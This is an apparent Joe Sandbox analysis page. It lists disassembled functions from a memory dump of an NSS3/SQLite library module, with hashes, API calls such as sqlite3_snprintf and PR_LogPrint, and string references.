Instruction ID: ea0101f4134dd8d9337204da13200f33991b0b4a5e798aa607d410fd95909f15
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: DB71F372E017158FD728CF99C98066AB7F2ABC8304F146A6DD85A97B91D770ED00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6C774DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C775125

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: d441bcd7fac28b6a7198b099ff211fb73c2f3995d5cfb5a4cc04eb04416d00ca
Instruction ID: 21946d19d61ff1305d7916735438f53c3e1ddd1a7f83098c64f634b3a75290a3
Opcode Fuzzy Hash: d441bcd7fac28b6a7198b099ff211fb73c2f3995d5cfb5a4cc04eb04416d00ca
Instruction Fuzzy Hash: 02E10A70A08344CFDB14DF28E58465ABBF0BF89319F258A2DE89997351E7309985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C7FE5F0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalEnterExitMonitorSectionUnlockValue
String ID:
API String ID: 344640607-0
Opcode ID: fc0a1b4b0e1f60ce4ed3c4a88a65eb44b580009de636c75f0edaa333733db743
Instruction ID: e2492a963876c32967ff94e8e368ba43c1fa305dea6eef87c18ff01378af08e1
Opcode Fuzzy Hash: fc0a1b4b0e1f60ce4ed3c4a88a65eb44b580009de636c75f0edaa333733db743
Instruction Fuzzy Hash: 8AD1ABB1D0061C9BEB11DF65DE847AE77B5AF4971CF040138E82467B01EB35A91ACBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7645B0 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc4c1a5f1c9f68d458a3079158d5aa391b02d32df37a1b58261a8ade4e1aec0
Instruction ID: a62485f20a213d2b46c2780cfe574284ab77c6fb8686f8587ab7f034718318ab
Opcode Fuzzy Hash: 0fc4c1a5f1c9f68d458a3079158d5aa391b02d32df37a1b58261a8ade4e1aec0
Instruction Fuzzy Hash: E2D1D772E006168BCB0CCF69CAA01AEBBF2FF98314719856ED845DBB51D775D902DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6C7FA430 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8790081967d2dbffe37cc5ec6079939e0a5e9bf4300f9c0b5283f10552b966b2
Instruction ID: 776299d991d6c05d72e080d35977f67c27ea62b7a15bab853e566daa37bc7ecc
Opcode Fuzzy Hash: 8790081967d2dbffe37cc5ec6079939e0a5e9bf4300f9c0b5283f10552b966b2
Instruction Fuzzy Hash: E6818D70A012058FDB19CF58D684BAABBE4EF88318F15817DE82A9B750DB74D942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D8EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f483659efc7112e3aac274a78f803fe388116fc89b3e3b37dad1d56af932a969
Instruction ID: bb1e4d725c05cc4bdd8f0933a69b928e8ef72e03dc60f39d28f9ffa34ef79bcd
Opcode Fuzzy Hash: f483659efc7112e3aac274a78f803fe388116fc89b3e3b37dad1d56af932a969
Instruction Fuzzy Hash: A3110132A042068BD704DF25D988B5AB3A9FF4231CF1A527AD8058FA41C375E882CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc041f0583a2513369512b4967c9ef493693e362567f18d454d838222cb246d8
Instruction ID: e34e0539151a7739f56d61a7b6b8824edb07829734879aa59d18fb1e2b17c0a2
Opcode Fuzzy Hash: fc041f0583a2513369512b4967c9ef493693e362567f18d454d838222cb246d8
Instruction Fuzzy Hash: 8611C1B4704305CFCB20DF19C99466A7BA1FF85368F148469D8199B702DB31E806CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8244C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84e7cf86d1c4b1291a75f5fdc17689633453d67d12f82b98d33a762f6224ddc
Instruction ID: 1a0f9a0ae6a6ddc4e5434f84541fb635e353f81924ffac2f0a42cdd5b7191077
Opcode Fuzzy Hash: f84e7cf86d1c4b1291a75f5fdc17689633453d67d12f82b98d33a762f6224ddc
Instruction Fuzzy Hash: C311F3B6A002199F8B10CF99D9809EFBBF9EF8C664B554429ED18A7301D230ED518BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6C824440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60d82e56da05b5457db1910fe4624e690345b6e53061fbd1804e6b46237b275d
Instruction ID: bb01d5e8cda312f961f4d90baad2990f593eefd3376ca24537a3fcd8f16ead98
Opcode Fuzzy Hash: 60d82e56da05b5457db1910fe4624e690345b6e53061fbd1804e6b46237b275d
Instruction Fuzzy Hash: EC110975A0021D9F8B10CF59C9809EFB7F8EF8C214B16456AED18E7301E634ED118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B0D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 0f64a974fe44077da52324f78dc57622bc9f30781cd66916ac1dbe462818fcac
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 59E0927A302154A7DB248E49C650AA97359EF8161AFBC897DCC5DAFB42D733F8038781

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B6E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C76CA30: EnterCriticalSection.KERNEL32(?,?,?,6C7CF9C9,?,6C7CF4DA,6C7CF9C9,?,?,6C79369A), ref: 6C76CA7A
Part of subcall function 6C76CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C76CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C77BE66), ref: 6C8B6E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C77BE66), ref: 6C8B6E98
sqlite3_snprintf.NSS3(?,00000000,6C91AAF9,?,?,?,?,?,?,6C77BE66), ref: 6C8B6EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C77BE66), ref: 6C8B6ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C77BE66), ref: 6C8B6EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B6F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B6F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B6F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C77BE66), ref: 6C8B6FA6
sqlite3_snprintf.NSS3(?,00000000,6C91AAF9,00000000,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B6FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B6FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B6FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B7014
sqlite3_free.NSS3(00000000,?,?,?,?,6C77BE66), ref: 6C8B701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C77BE66), ref: 6C8B7030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C77BE66), ref: 6C8B7079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B7097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C77BE66), ref: 6C8B70A0

Strings

mz_etilqs_, xrefs: 6C8B6F18
winGetTempname4, xrefs: 6C8B7046
winGetTempname2, xrefs: 6C8B70C4
winGetTempname1, xrefs: 6C8B708F
winGetTempname5, xrefs: 6C8B7071

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 8e06fa0994432401d02af01233f9478bafc46e1653af12a352ae7b7d30c14558
Instruction ID: c729c99432457056ceda4faf60e69b6e5f6cdc921aab0befc190238436b71f26
Opcode Fuzzy Hash: 8e06fa0994432401d02af01233f9478bafc46e1653af12a352ae7b7d30c14558
Instruction Fuzzy Hash: 14517BB2A0421157E72456349D59FBB366A9F92348F144938E815A7FC1FF35A80F82E3

Uniqueness

Uniqueness Score: -1.00%

Function 6C844FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7F75C2,00000000,00000000,00000001), ref: 6C845009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7F75C2,00000000), ref: 6C845049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C84505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C845071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C845089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8450A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C8450B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7F75C2), ref: 6C8450CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8450D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8450F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C845103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C84511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C84512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C845145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C845153
free.MOZGLUE(?), ref: 6C84516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C84517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C845195

Strings

parameters=, xrefs: 6C84506B
nss=, xrefs: 6C845083
library=, xrefs: 6C845043
name=, xrefs: 6C845057
config=, xrefs: 6C84509B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 289f5b6db47be404ee8ab03b1e9758132481b9adb6e6002020dd3c850c46b80b
Instruction ID: b430fba0aa666492c915798a01ecd552704c3b2e8e51710d0d9fe0bfe3fe3055
Opcode Fuzzy Hash: 289f5b6db47be404ee8ab03b1e9758132481b9adb6e6002020dd3c850c46b80b
Instruction Fuzzy Hash: 5351BBB5A0131E9BEB21DF24DE41AAF37A89F06248F144830EC59E7741E735E915C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 6C818E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C818E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C818EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C818EB3

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C818EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C818EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C818F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C818F29
PR_LogPrint.NSS3(?,00000000), ref: 6C818F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C818F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C818F80
PR_LogPrint.NSS3(?,00000000), ref: 6C818F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C818FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C818FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C819047

Strings

pulWrappedKeyLen = 0x%p, xrefs: 6C818FC8
hWrappingKey = 0x%x, xrefs: 6C818F01, 6C818F11
(CK_INVALID_HANDLE), xrefs: 6C818EAC, 6C818F1F, 6C818F79
*pulWrappedKeyLen = 0x%x, xrefs: 6C819042
hSession = 0x%x, xrefs: 6C818E8E, 6C818E9E
pMechanism = 0x%p, xrefs: 6C818EE0
hKey = 0x%x, xrefs: 6C818F5B, 6C818F6B
pWrappedKey = 0x%p, xrefs: 6C818FAD
C_WrapKey, xrefs: 6C818E71

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: cabfb0e50a4b6124cad53b4a072a0fbd1a54b6b8de298e6f5963d83c85336d64
Instruction ID: f80ae451785b986920a9f16c315da2ba5d116a8bed223458b899c55f5b4b2af3
Opcode Fuzzy Hash: cabfb0e50a4b6124cad53b4a072a0fbd1a54b6b8de298e6f5963d83c85336d64
Instruction Fuzzy Hash: 8651C431A09109EFDB209F589E49F9A37F6BB4631CF058836F508A7E12D730D919CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C844C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C834F51,00000000), ref: 6C844C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C834F51,00000000), ref: 6C844C5B
PR_smprintf.NSS3(6C91AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C834F51,00000000), ref: 6C844C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C834F51,00000000), ref: 6C844CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C844CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C844CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C844D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C834F51,00000000), ref: 6C844D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C834F51,00000000), ref: 6C844D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C844D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C844DA2
free.MOZGLUE(?), ref: 6C844DB9
free.MOZGLUE(00000000), ref: 6C844DCF

Strings

%s,%s, xrefs: 6C844C4B
timeout, xrefs: 6C844C91
slotFlags, xrefs: 6C844D34
rust, xrefs: 6C844D22
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C844D9D
every, xrefs: 6C844CA1
ootT, xrefs: 6C844D1A
0x%08lx=[%s %s], xrefs: 6C844D80
any, xrefs: 6C844C96
rootFlags, xrefs: 6C844D47

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 3a7bbe461455ac481b7643d0d7b64fce1737147a44276a4a974c338b1fb865be
Instruction ID: 1c75d916810c0335ce28e264744d5d92a416b335bb64ef81341615dcb1841249
Opcode Fuzzy Hash: 3a7bbe461455ac481b7643d0d7b64fce1737147a44276a4a974c338b1fb865be
Instruction Fuzzy Hash: 9A418AB190014D6BDB329F189D45BBB3A65AFC2349F198538E81A4BB01E735D914C7D3

Uniqueness

Uniqueness Score: -1.00%

Function 6C822D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C822DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C822E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C822E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C822E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C7F4F1C,?,-00000001,00000000,?), ref: 6C822E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C7F4F1C,?,-00000001,00000000), ref: 6C822E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C822EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C822EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C822EF8
PR_Unlock.NSS3(?), ref: 6C822F62
